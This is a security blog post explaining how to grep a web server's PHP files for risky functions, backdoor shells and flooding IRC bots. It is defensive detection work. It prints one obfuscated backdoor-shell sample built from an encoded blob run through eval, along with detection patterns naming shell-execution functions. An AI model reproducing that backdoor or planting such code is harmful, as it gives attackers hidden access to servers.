Thursday, April 26, 2012

Simple Kung Fu Grep for Finding Common Web Vulnerabilities & Backdoor Shells

Grep is a powerful command-line tool in Unix and Linux used for searching and probing data sets for lines that matches a regular expression. As a short history, this utility was coded by Ken Thompson on March 3, 1973 for Unix.

Here is a sample or common usage of the said tool for searching a text string pBot in my php file bot.php:

grep pbot bot.php
Alright let's proceed on the objective of this article which is to find common vulnerabilities, backdoor shells and other malicious files using the grep command. For this writeup I'm using grep version 2.9 so if you are using a an older version of GNU grep which is below 2.5.4,  some of the commands in this article may not work although grep. To determine the version of grep you can just type grep -V or grep --version in your terminal. For the other commands and arguments that can be appended to this command line kung fu, you can also type grep --help for more information.
Common Usage for Finding Vulnerabilities
The very reason why most web applications can be easily hacked or pawned because of insecure codes and functions that can be exploited. Take for example command injection or also known as remote code execution in terms of web exploitation, can be possible to a certain website accepts added strings of characters or arguments; the inputs are used as arguments for executing the command in the web server. And because most vulnerable web applications use the shell_exec function. We can use the grep command to search for the shell_exec in as our advantage in our /var/www directory to check for the possible PHP files that are vulnerable to RCE or command injection. Here is the command: 

grep -Rn "shell_exec *( " /var/www

In the image above, we can see that it displays the path of the vulnerable script and the line of the function.

Another example: the include, require, include_once and require_once functions which are common PHP functions in a vulnerable script that is possible for LFI or Local File Inclusion which is 
a kind of exploit or vulnerability that allows an attacker to inject directory traversal characters on a certain website. 

Again, we can use these functions for searching possible vulnerable scripts in our web server:

grep -Rn "include *(" /var/www
grep -Rn "require *(" /var/www
grep -Rn "include_once *(" /var/www
grep -Rn "require_once *(" /var/www
There are other PHP functions out there that can also be used for finding other web vulnerabilities. Just use Google for other functions :)

Grepping for Backdoor Shells and other Malicious Files


Backdoors are used by web defacers and hackers to maintain access on the web server which allows them to execute arbitrary commands, download files, edit files, and for back-connection. Most backdoor shells use the shell_exec function for command execution. And because most anti-viruses and rootkit scanners can detect backdoor shells, attackers use PHP encoders for evasion. But because functions like base64_decode and eval are used in this technique, they can't escape the wrath of grep. Here is a sample backdoor shell that has upload and system information functions only encoded using Carbylamine PHP Encoder:


<?php function KJnPCP($XZK)


{
$XZK=gzinflate(base64_decode($XZK));
for($i=0;$i<strlen($XZK);$i++)
{
$XZK[$i] = chr(ord($XZK[$i])-1);
}
return $XZK;
}
eval(KJnPCP("U1QEAm4gzkrXzCopSSvVVE3wcAuN0SjJTMvN1YjT0lJMS8ks
0FS2LSxOs1fWBwsnpFWmpaAp1FdWVFfW0le2NQAr1LLBZmhhZiHCyLTypF
zNktLirMKUktwkoDElaMqwmwHSizAEVdCG28GeGwA="));
?>

Aside from shell_exec, base64_decode, and eval; here are other functions used by PHP backdoor shells:

phpinfo

system
php_uname
chmod
fopen
flclose
readfile
edoced_46esab
passthru

Thus you could also easliy grep these functions:


grep -Rn "shell_exec *(" /var/www
grep -Rn "base64_decode *(" /var/www
grep -Rn "phpinfo *(" /var/www
grep -Rn "system *(" /var/www
grep -Rn "php_uname *(" /var/www
grep -Rn "chmod *(" /var/www
grep -Rn "fopen *(" /var/www
grep -Rn "fclose *(" /var/www
grep -Rn "readfile *(" /var/www
grep -Rn "edoced_46esab *(" /var/www
grep -Rn "eval *(" /var/www 
grep -Rn "passthru *(" /var/www
 
In my recent analysis, some of these functions are used by IRC bots that have malicious functions like vulnerability scanners, automatic backdoor bots, DoS bots, udpflooder bots, etc.

Oh, and you might wanna add tcpflood and udpflood strings for grepping malicious files too because these are commonly used by IRC bots that have udpflood and tcpflood functions.
What you saw from the image above is a sample of a pBot which is a PHP IRC bot  used by some attackers to initiate DDoS (Distributed Denial of Service) / DoS (Denial of Service) attacks.

We can also list all these common functions by using this command in your terminal:


grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\(" /var/www

References: 
http://25yearsofprogramming.com/blog/2010/20100315.htm
http://php.net/

About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.